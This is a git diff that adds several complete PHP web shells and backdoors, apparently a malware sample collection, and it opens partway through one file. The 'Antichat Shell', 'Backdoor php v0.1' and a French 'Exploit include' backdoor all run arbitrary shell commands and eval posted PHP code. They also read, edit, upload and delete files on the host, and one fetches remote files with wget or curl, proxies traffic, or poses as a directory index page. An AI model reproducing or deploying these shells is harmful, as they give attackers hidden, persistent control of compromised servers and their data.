+   die();
+  break;
+  
+  case 'info':
+   $content .= $shell->outputinfo();
+  break;
+  
+  case 'execute':
+   $content .= $shell->executeform();
+  break;
+  
+  case 'exesys':
+   $content .= $shell->exesysform();
+  break;
+ }
+ 
+ $content .= $shell->outputdown();
+ 
+ echo $content;
+ echo '<center>Âðåìÿ ãåíåðàöèè: '.($shell->getmicrotime()-$timestart).'</center>';
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/antichat.php.php.txt b/xakep-shells/PHP/antichat.php.php.txt
new file mode 100644
index 0000000..01702a8
--- /dev/null
+++ b/xakep-shells/PHP/antichat.php.php.txt
@@ -0,0 +1,366 @@
+<?php
+session_start();
+error_reporting(0);
+set_time_limit(9999999);
+$login='antichat';
+$password='antichat';
+$auth=1;
+$version='version 1.5 by Grinay';
+$msgnotice='';
+$style='<STYLE>
+BODY{
+  background-color: #2B2F34;
+  color: #C1C1C7;
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  MARGIN-TOP: 0px;
+  MARGIN-BOTTOM: 0px;
+  MARGIN-LEFT: 0px;
+  MARGIN-RIGHT: 0px;
+  margin:0;
+  padding:0;
+  scrollbar-face-color: #336600;
+  scrollbar-shadow-color: #333333;
+  scrollbar-highlight-color: #333333;
+  scrollbar-3dlight-color: #333333;
+  scrollbar-darkshadow-color: #333333;
+  scrollbar-track-color: #333333;
+  scrollbar-arrow-color: #333333;
+}
+input{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+select{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+textarea{
+  background-color: #333333;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+a:link{
+  
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:visited{
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:hover, a:active{
+  width: 100%;
+  background-color: #A8A8AD;
+  
+
+  color: #E7E7EB;
+  text-decoration: none;
+  font-size: 8pt;
+}
+td, th, p, li{
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  border-color:black;
+}
+</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+
+//error parser
+$filext="File already exists.";
+$uploadok="File was successfully uploaded.";
+$dircrt="Dir is created.";
+$dircrterr="Don't create dir.";
+$dirnf="Dir not found.";
+$empty="Directory not empty or access denide.";
+$deletefileok="File deleted";
+$deletedirok="Dir deleted";
+//end error parser
+
+//auth
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+if(@$_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+//end auth
+
+function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
+
+
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+
+$dir=chdir($dir);
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+
+
+
+
+
+//crdir
+
+
+if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+  
+//Current type OS
+if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
+
+
+
+ 
+ 
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $msgnotice.=$deletefileok;
+}
+//end delete
+
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
+
+}
+//end delete
+?>
+
+<? echo $header;?> 
+<!--content-->
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='upload'; document.reqs.submit();">| Upload</a></td>
+<td><a href="#" onclick="document.reqs.action.value='phpeval'; document.reqs.submit();">| Php Eval</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+<td><a href="#" onclick="history.back();"> <-back |</a></td>
+<td><a href="#" onclick="history.forward();"> forward->|</a></td>
+
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+<!--end one content-->
+<?php if(@$msgnotice!="") echo $msgnotice;?>
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+
+
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+
+
+if ($GLOBALS['win']==1) {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a>
+<a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Delete this file">X</a></td>
+</tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if(@$_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+
+//upload
+if($action=="upload"){
+  if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<tr><td><form method=POST enctype=multipart/form-data>Upload to dir:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>New file name:<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload local file'></td></tr>";
+  if($GLOBALS['win']==1)echo $form_win;
+  if($GLOBALS['win']==0){
+    echo $form_win;
+	echo '<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(@$_POST['uploadloc']){
+if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(!file_exists($dirupload)){createdir($dirupload);}
+if(file_exists($uploadfile))echo $GLOBALS['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+echo $GLOBALS['uploadok'];
+}
+
+if(@$_POST['upload']){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:
+	  shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
+	  break;
+ 	  case fetch:
+ 	  shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
+ 	  break;
+ 	  case lynx:
+ 	  shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case links:
+ 	  shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case GET:
+ 	  shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case curl:
+ 	  shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
+ 	  break;
+	 }
+	}
+  
+}
+//end upload section
+
+
+if($action=="phpeval"){
+ echo "
+<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpheval\">
+ &lt;?php<br>
+<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+?><br>
+<input type=\"submit\" value=\"execute\"></form>";} 
+if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
+?>
+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/backdoor1.php.txt b/xakep-shells/PHP/backdoor1.php.txt
new file mode 100644
index 0000000..a82e151
--- /dev/null
+++ b/xakep-shells/PHP/backdoor1.php.txt
@@ -0,0 +1,181 @@
+<?
+/*
+   Backdoor php v0.1
+   Coded By Charlichaplin
+   charlichaplin@gmail.com
+   Join me: irc.fr.worldnet.net #s-c
+   Greetz: My dog :)
+*/
+
+class backdoor {
+   var $pwd;
+   var $rep;
+   var $list = array();
+   var $file;
+   var $edit;
+   var $fichier;
+   var $del;
+   var $shell;
+   var $proxy;
+      
+   function dir() {
+      if(!empty($this->rep)) {
+      $dir = opendir($this->rep);
+      } else {
+         $dir = opendir($this->pwd);
+      }
+      while($f = readdir($dir)) {
+          if ($f !="." && $f != "..") {
+             $this->list[] = $f;
+          }
+      }
+   }
+   
+   function view() {
+      
+      $this->file = htmlentities(highlight_file($this->file));
+   }
+   
+   function edit() {
+      if(!is_writable($this->edit)) {
+         echo "Ecriture impossible sur le fichier";
+      } elseif(!file_exists($this->edit)) {
+         echo "Le fichier n'existe pas ";
+      } elseif(!$this->fichier) {
+         $fp = fopen($this->edit,"r");
+         $a = "";
+         while(!feof($fp)) {
+            $a .= fgets($fp,1024);
+         }
+         echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";               
+      } else {
+         $fp = fopen($this->edit,"w+");
+         fwrite($fp, $this->fichier);
+         fclose($fp);
+         echo "Le fichier a été modifié";
+         
+      }
+   }
+   
+   function del() {
+      if(is_file($this->del)) {
+         if(unlink($this->del)) {
+            echo "Fichier supprimé";
+         } else {
+            echo "Vous n'avez pas les droits pour supprimer ce fichier";
+         }
+      } else {
+         echo $this->del." n'est pas un fichier";
+      }
+   }
+   
+   function shell() {
+      echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
+      system($this->shell);
+   }
+   
+   function proxy($host,$page) {
+      
+      $fp = fsockopen($host,80);
+      if (!$fp) {
+         echo "impossible d'etablir un connection avec l'host";
+      } else {
+         $header = "GET ".$page." HTTP/1.1\r\n";
+         $header .= "Host: ".$host."\r\n";
+         $header .= "Connection: close\r\n\r\n";
+         fputs($fp,$header);
+         while (!feof($fp)) {
+            $line = fgets($fp,1024);
+            echo $line;
+         }
+         fclose($fp);
+      }
+   }
+   
+   function ccopy($cfichier,$cdestination) {
+      if(!empty($cfichier) && !empty($cdestination)) {
+         copy($cfichier, $cdestination);
+         echo "Le fichier a été copié";
+      } else {
+         echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
+      }
+   }
+}
+if(!empty($_REQUEST['rep'])) {
+   $rep = $_REQUEST['rep']."/";
+}
+$pwd = $_SERVER['SCRIPT_FILENAME'];
+$pwd2  = explode("/",$pwd);
+$file = $_REQUEST['file'];
+$edit = $_REQUEST['edit'];
+$fichier = $_POST['fichier'];
+$del = $_REQUEST['del'];
+$shell = $_REQUEST['shell'];
+$proxy = $_REQUEST['proxy'];
+$copy = $_REQUEST['copy'];
+$cfichier = $_POST['cfichier'];
+$cdestination = $_POST['cdestination'];
+
+$n = count($pwd2);
+$n = $n - 1;
+$pwd = "";
+for ($i = 0;$i != $n;$i = $i+1) {
+   $pwd .= "/".$pwd2[$i];
+}
+
+if($proxy) {
+$host2 = explode("/",$proxy);
+$n = count($host2);
+$host = $host2[2];
+$page = "";
+for ($i = 3;$i != $n;$i = $i+1) {
+   $page .= "/".$host2[$i];
+}
+echo $page;
+}
+
+echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
+$backdoor = new backdoor();
+$backdoor->pwd = $pwd;
+$backdoor->rep = $rep;
+$backdoor->file = $file;
+$backdoor->edit = $edit;
+$backdoor->fichier = $fichier;
+$backdoor->del = $del;
+$backdoor->shell = $shell;
+$backdoor->proxy = $proxy;
+echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
+$backdoor->dir();
+
+echo "</TD></TR></TABLE><PRE>";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
+echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
+echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\"     \"> <A HREF=\"\">Name</A>                    <A HREF=\"\">Last modified</A>       <A HREF=\"\">Size</A>  <A HREF=\"\">Description</A>";
+echo "<HR noshade align=\"left\" width=\"80%\">";
+
+if($file) {
+   $backdoor->view();   
+} elseif($edit) {
+   $backdoor->edit();
+} elseif($del) {   
+   $backdoor->del();
+} elseif($shell) {   
+   $backdoor->shell();
+}elseif($proxy) {
+   $backdoor->proxy($host,$page);
+}elseif($copy == 1) {
+   $backdoor->ccopy($cfichier,$cdestination);
+} else {
+   echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A>         ".date("r",realpath($rep."../"))."     - <br>";
+   foreach ($backdoor->list as $key => $value) {
+      if(is_dir($rep.$value)) {
+         echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A>                  ".date("r",filemtime($rep.$value))."      -  <br>";
+      } else {
+         echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A>  <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a>          ".date("r",filemtime($rep.$value))."     1k  <br>";
+      }
+   }
+}
+echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
+echo "<center><b>Coded By Charlichaplin</b></center>";
+echo "</BODY></HTML>";
\ No newline at end of file
diff --git a/xakep-shells/PHP/backdoorfr.php.txt b/xakep-shells/PHP/backdoorfr.php.txt
new file mode 100644
index 0000000..7fd627a
--- /dev/null
+++ b/xakep-shells/PHP/backdoorfr.php.txt
@@ -0,0 +1,234 @@
+<? 
+print("<html><head><title>Backdoor PHP codée par rAidEn & LFL</title></head><body
+bgcolor=\"white\" LINK=\"blue\" VLINK=\"blue\">");
+print("<p align=\"center\"><font size=\"5\">Exploit include v1.0</font></p>");
+print("<p>Ce script permet d'exploiter une faille include ou une frame mal placée de type :
+www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tant que backdoor sur un serveur pour garder une porte d'entrée dérobée.<br><br>
+<u>par rAidEn & LFL , article publié dans The Hackademy Journal numéro 12</u><br><br>Spécial greetz à : Crash_FR, MatraX, Elboras, papar0ot, Lostnoobs, Icarus, Xelory, L_Abbe, Daedel, DHS-team, Carlito, xdream_blue, redils,  IHC, Wanadobe.biz, #abyssal, #cod4, #hzv, #security-corp, #Revolsys, ...... et tout ceux que j'ai oublié & aussi et surtout à (feu)tim-team</p>");
+
+/******Code source du système de remote*****/
+
+$QS = $QUERY_STRING;
+if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
+if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";
+
+/*pour les forms*********************************/
+$tab = explode("&", $QS);
+$i=0;
+$remf = "";
+while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
+{
+    $temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
+    eval("\$temp2=\${$temp};");
+    $remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
+."'>\n";
+    $i++;
+}
+/*
+$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
+if($temp!="")
+{
+    eval("\$temp2=\${$temp};");
+    $remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
+."'>\n";
+}*/
+/************************************************/
+
+
+/*pour les links*********************************/
+if($QS != "separateur")
+    $reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
+"&separateur";
+else $reml = "?$QS";
+$adresse_locale = $reml;
+/************************************************/
+
+
+
+
+print("<hr>");
+print("<a href=\"$adresse_locale&option=1\">Exécuter une commande dans un shell</a><br> <!-- utiliser exec($commande, $retour); -->");
+print("<a href=\"$adresse_locale&option=2\">Exécuter du code PHP</a><br>");
+print("<a href=\"$adresse_locale&option=3\">Lister un répertoires</a><br>");
+print("<a href=\"$adresse_locale&option=4\">Gérer les fichiers</a><br>");
+print("<a href=\"$adresse_locale&option=5\">Envoyer un mail</a><br>");
+print("<a href=\"$adresse_locale&option=6\">Infos serveur</a><br>");
+print("<a href=\"mailto:raiden_cyb@hotmail.com\">Contacter le créateur</a><br><hr>");
+
+
+/* récupération des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */
+$option = $_REQUEST["option"];
+$rep =  $_REQUEST["rep"];
+$nom =  $_REQUEST["nom"];
+$option_file =  $_REQUEST["option_file"];
+$cmd =  $_REQUEST["cmd"];
+$code =  $_REQUEST["code"];
+$msg =  $_REQUEST["msg"];
+$option_mail =  $_REQUEST["option_mail"];
+$destinataire =  $_REQUEST["destinataire"];
+$sujet =  $_REQUEST["sujet"];
+$message =  $_REQUEST["message"];
+
+if($option == 1){
+    print("<form action=\"?\"> $remf Commande : <input type=\"text\" name=\"cmd\"></form>");
+    echo "<br> PS : peu de serveurs acceptent les commandes venant de PHP";
+}
+
+if($option == 2){
+    print("<form action=\"?\"> $remf Code : <input type=\"text\" name=\"code\"></form>");
+}
+
+if($option == 3){
+    print("<form action=\"?\"> $remf Répertoire à lister : <input type=\"text\" name=\"rep\"></form>");
+    print("$rep");
+}
+
+if($option == 4){
+    print("<br><form action=\"?\"> $remf");
+    print("<br>Nom du fichier :<br><input type=text name=\"nom\">");
+    print("<input type=hidden name=option value=$option>");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"mkdir\" >Créer le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"edit\" >Éditer le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"del\" >Supprimer le
+fichier");
+    print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"read\" CHECKED>Lire le
+fichier");
+    print("<input type=submit value=Go>");
+    print("</form>");
+}
+
+
+if($option == 5){
+    print("<PRE><form action=\"?\"> $remf Destinataire : <input type=\"text\" name=\"destinataire\" size=\"80\">");
+    print("<br>Provenance du mail : <input type=\"text\" name=\"provenance\" size=\"80\"><br>");
+    print("Adresse de retour : <input type=\"text\" name=\"retour\" size=\"80\"><br>");
+    print("Sujet : <input type=\"text\" name=\"sujet\" size=\"80\"><br>");
+    print("Message : <input type=\"text\" name=\"message\"
+size=\"80\"><br><input type=\"submit\" value=\"Envoyer\"></form></PRE>");
+}
+
+if($option == 6){
+    echo"Nom du serveur : <a href=\"http://$SERVER_NAME\">$SERVER_NAME</a><br>
+";
+    echo"Adresse IP du serveur : <a href=\"http://$SERVER_ADDR\">$SERVER_ADDR</a><br> ";
+    echo"Port utilisé par défault 80 : <font color=\"red\">$SERVER_PORT</font><br> ";
+    echo"Mail de l' admin : <a href=\"mailto:$SERVER_ADMIN\">$SERVER_ADMIN</a><br><br>";
+    
+    
+    echo"Racine du serveur : <font color=\"red\">$DOCUMENT_ROOT</font><br>";
+    echo"Adresse menant à COMMAND.COM : <font color=\"red\">$COMSPEC</font><br>";
+    echo"Path installé sur le serveur : <font color=\"red\">$PATH</font> <br>";
+    echo"OS, SERVEUR, version PHP : <font color=\"red\">$SERVER_SOFTWARE</font><br><br>";
+    
+    echo"Version du protocole utilisé (HTTP) : <font color=\"red\">$SERVER_PROTOCOL</font><br>";
+    echo"En-tête Accept du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT</font><br>";
+    echo"En tête User_agent du protocole HTTP : <font color=\"red\">$HTTP_USER_AGENT</font><br>";
+    echo"En-tête Accept-Charset du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_CHARSET</font><br> ";
+    echo"En-tête Accept-Encoding du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_ENCODING</font><br> ";
+    echo"En-tête Accept-Language du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_LANGUAGE</font><br> ";
+    echo"En-tête Connection du protocole HTTP : <font color=\"red\">$HTTP_CONNECTION</font><br> ";
+    echo"En-tête Host du protocole HTTP : <font color=\"red\">$HTTP_HOST</font><br><br>";
+    
+    echo"Version de CGI : <font color=\"red\">$GATEWAY_INTERFACE</font><br> ";
+    echo"Version de récupération du form : <font color=\"red\">$REQUEST_METHOD</font><br> ";
+    echo"Argument de l' adresse : <font color=\"red\">$QUERY_STRING</font> <br>";
+    echo"Nom du script : <font color=\"red\">$SCRIPT_NAME</font><br> ";
+    echo"Chemin du script : <font color=\"red\">$SCRIPT_FILENAME</font><br> ";
+    echo"Adresse entière du script : <font color=\"red\">$REQUEST_URI
+</font><br>";
+}
+
+/* Commande*******/
+if($cmd != "")
+{
+    echo "{${passthru($cmd)}}<br>";
+}
+/* Commande*******/
+
+
+/* Exécution de code PHP**********/
+if($code != ""){
+    $code = stripslashes($code);
+    eval($code);
+}
+/* Execution de code PHP**********/
+
+
+/* Listing de rep******************/
+if($rep != "")
+{
+    if(strrchr($rep, "/") != "" ||  !stristr($rep, "/")) $rep .= "/";
+    $dir=opendir($rep);
+    while ($file = readdir($dir)) 
+    {
+    	    if (is_dir("$rep/$file") && $file!='.')
+	    { 
+    		    echo"<li><a href=\"$adresse_locale&rep=$rep$file\">(rep) $file
+</a><br>\n";
+	    }elseif(is_file("$rep/$file"))
+	    {
+	    	    echo "<li>	<a
+href=\"$adresse_locale&option_file=read&nom=$rep$file\">(file) $file</a> <a
+href=\"$adresse_locale&option_file=del&nom=$rep$file\">del</a> <a
+href=\"$adresse_locale&option_file=edit&nom=$rep$file\">edit</a><br>\n";
+	    }
+    }
+}
+/* Listing de rep******************/
+
+
+/* Gestion des fichiers*********************/
+if($option_file == "mkdir" && $nom != "")
+{
+    $fp = fopen($nom, "w");
+    fwrite($fp, stripslashes($msg));
+    print("Fichier crée/modifié");
+}
+
+if($option_file == "read" && $nom != "")
+{
+    $fp = fopen($nom, "r");
+    $file = fread($fp, filesize($nom));
+    $file = htmlentities ($file, ENT_QUOTES);
+    $file = nl2br($file);
+    echo "<br>$file";
+}
+
+if($option_file == "del" && $nom != "")
+{
+    unlink($nom);
+    print("Fichier effacé");
+}
+
+if($option_file == "edit" && $nom != "")
+{
+    $fp = fopen($nom, "r");
+    $file = fread($fp, filesize($nom));
+    $file = htmlentities ($file, ENT_QUOTES);
+    echo "<form action=$adresse_locale> $remf";
+    echo "<TEXTAREA COLS=80 rows=25 name=msg>$file</textarea>";
+    echo "<input type=hidden name=option_file value=mkdir>";
+    echo "<input type=hidden name=nom value=$nom>";
+    echo "<br><input type=submit value=Go> PS : les fichiers trop longs ne passent po :(";
+    echo "</form>";
+}
+/* Gestion des fichiers*********************/
+
